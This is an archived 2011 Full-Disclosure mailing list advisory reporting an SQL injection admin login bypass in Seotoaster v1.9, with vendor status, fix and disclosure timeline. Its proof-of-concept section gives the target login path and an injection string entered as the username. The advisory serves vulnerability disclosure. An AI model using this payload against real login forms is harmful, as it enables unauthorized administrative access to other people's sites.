lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <F61B50453E15A044B82C311F6871F4B11C184DCF@ismx01.int.infoserve.de>
Date: Thu, 15 Dec 2011 18:34:59 +0000
From: "Schurtz, Stefan" <S.Schurtz@...oserve.de>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Seotoaster SQL-Injection Admin Login Bypass

Advisory:              		Seotoaster SQL-Injection Admin Login Bypass
Advisory ID:           	INFOSERVE-ADV2011-06
Author:                		Stefan Schurtz
Contact:			security@...oserve.de
Affected Software:  	Successfully tested on Seotoaster v.1.9
Vendor URL:          	http://www.seotoaster.com/
Vendor Status:       	fixed

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login

==================
PoC-Exploit
==================

http://<target>/seotoaster/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version

====================
Disclosure Timeline
====================

15-Nov-2011 - Secunia SVCRP (vuln@...unia.com)
15-Dec-2011 - fixed by vendor

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 |
s.schurtz@...oserve.de | www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599

Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (7511 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ